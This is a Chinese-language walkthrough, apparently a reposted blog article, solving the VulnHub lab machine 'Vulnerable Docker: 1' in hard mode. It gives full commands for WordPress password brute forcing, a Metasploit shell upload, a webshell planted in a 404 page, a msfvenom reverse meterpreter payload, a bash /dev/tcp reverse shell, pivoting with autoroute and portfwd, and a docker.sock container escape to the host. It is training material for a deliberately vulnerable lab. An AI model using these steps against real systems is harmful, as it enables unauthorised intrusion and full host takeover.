vulnhub靶机之VULNERABLE DOCKER: 1-Hard困难模式

admin 2022年4月10日15:29:46评论341 views字数 1893阅读6分18秒阅读模式

虚拟机信息:

虚拟机下载地址https://www.vulnhub.com/entry/vulnerable-docker-1,208/

虚拟机简介:2 种模式:

    • 困难:这需要您结合您的 docker 技能以及您的渗透测试技能来实现主机妥协。

    • 简单:相对简单的路径,知道 docker 就足以破坏机器并在主机上获得 root

目标:2个flag(flag_1 和 flag_3),在主机上获得 id=0 shell 访问权限

级别:简单/中级

1.1 信息收集

在主机开启时,需要选择Hard模式
vulnhub靶机之VULNERABLE DOCKER: 1-Hard困难模式

1.主机信息收集

1、使用arp-scan进行扫描探测IP地址

arp-scan 192.168.207.0/24

vulnhub靶机之VULNERABLE DOCKER: 1-Hard困难模式

2、通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.207.129

查看开放22和8000端口,并且发现wp-admin页面

vulnhub靶机之VULNERABLE DOCKER: 1-Hard困难模式

2.WEB渗透测试

1 使用wpscan进行测试

wpscan --url "http://192.168.207.129:8000" -eu

获取到用户名微bob

vulnhub靶机之VULNERABLE DOCKER: 1-Hard困难模式

2.爆破bob用户

cd /usr/share/wordlists
git clone https://github.com/danielmiessler/SecLists.git
wpscan --url "http://192.168.207.129:8000/" -U bob -P /usr/share/wordlists/SecLists/Passwords/xato-net-10-million-passwords-100000.txt

获取到用户名为bob,密码为Welcome1

vulnhub靶机之VULNERABLE DOCKER: 1-Hard困难模式

3.登录账号测试

登录账号后发现flag_1信息

vulnhub靶机之VULNERABLE DOCKER: 1-Hard困难模式

vulnhub靶机之VULNERABLE DOCKER: 1-Hard困难模式

4.使用MSF进行连接

use exploit/unix/webapp/wp_admin_shell_upload
set USERNAME bob
set PASSWORD Welcome1
set RHOST 192.168.207.129
set RPORT 8000
run

vulnhub靶机之VULNERABLE DOCKER: 1-Hard困难模式

5.可以使用冰蝎连接

通过编辑404页面,插入冰蝎webshell

vulnhub靶机之VULNERABLE DOCKER: 1-Hard困难模式

使用冰蝎进行连接

http://192.168.207.129:8000/wp-content/themes/twentyseventeen/404.php

vulnhub靶机之VULNERABLE DOCKER: 1-Hard困难模式

6.使用MFS创建稳定会话

msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=192.168.207.130 LPORT=4444 -f elf > payload

vulnhub靶机之VULNERABLE DOCKER: 1-Hard困难模式

upload /root/payload /tmp/payload

通过冰蝎修改权限

vulnhub靶机之VULNERABLE DOCKER: 1-Hard困难模式

7.使用MSF创建监听并执行

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.207.130
set lport 4444
run -j

执行命令

execute -f /tmp/payload

获取到会话

vulnhub靶机之VULNERABLE DOCKER: 1-Hard困难模式

查看会话信息

vulnhub靶机之VULNERABLE DOCKER: 1-Hard困难模式

8.自动添加路由

run post/multi/manage/autoroute

vulnhub靶机之VULNERABLE DOCKER: 1-Hard困难模式

3.内网横向

1.扫描同网段主机

use auxiliary/scanner/portscan/tcp
set rhosts 172.18.0.0/24
set timeout 100
set threads 100
set concurrency 100
run

其中发现有22端口和一些其他端口,也发现有8022端口

vulnhub靶机之VULNERABLE DOCKER: 1-Hard困难模式

3.使用端口转发

使用端口转发其他主机的8022端口到本地

portfwd add -l 8022 -p 8022 -r 172.18.0.3

vulnhub靶机之VULNERABLE DOCKER: 1-Hard困难模式

访问转发端口,发现为docker的SSH

vulnhub靶机之VULNERABLE DOCKER: 1-Hard困难模式

4.反弹shell到本地

bash -i >& /dev/tcp/192.168.207.130/5555 0>&1

vulnhub靶机之VULNERABLE DOCKER: 1-Hard困难模式

由于机器假死,重新导入虚拟机后IP地址变了

vulnhub靶机之VULNERABLE DOCKER: 1-Hard困难模式

5.查看运行路径

 cd /var/run
ls -lah

这个容器docker.sock允许与 docker 通信,意味着可以创建、添加、删除容器

vulnhub靶机之VULNERABLE DOCKER: 1-Hard困难模式

6.登录容器

由于机器中无相关命令,需要安装相关软件

vulnhub靶机之VULNERABLE DOCKER: 1-Hard困难模式

apt update
apt install python docker wget

如果docker无法安装成功,可以通过在其他主机上复制docker二进制文件,并下载到容器中

7.使用Python创建虚拟终端

python -c 'import pty; pty.spawn("/bin/bash")' 
./docker run -it -v /:/host ubuntu bash
cd /host

vulnhub靶机之VULNERABLE DOCKER: 1-Hard困难模式

8.获取flag

vulnhub靶机之VULNERABLE DOCKER: 1-Hard困难模式

原文始发于微信公众号(安全孺子牛):vulnhub靶机之VULNERABLE DOCKER: 1-Hard困难模式

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月10日15:29:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub靶机之VULNERABLE DOCKER: 1-Hard困难模式http://cn-sec.com/archives/894479.html

发表评论

匿名网友 填写信息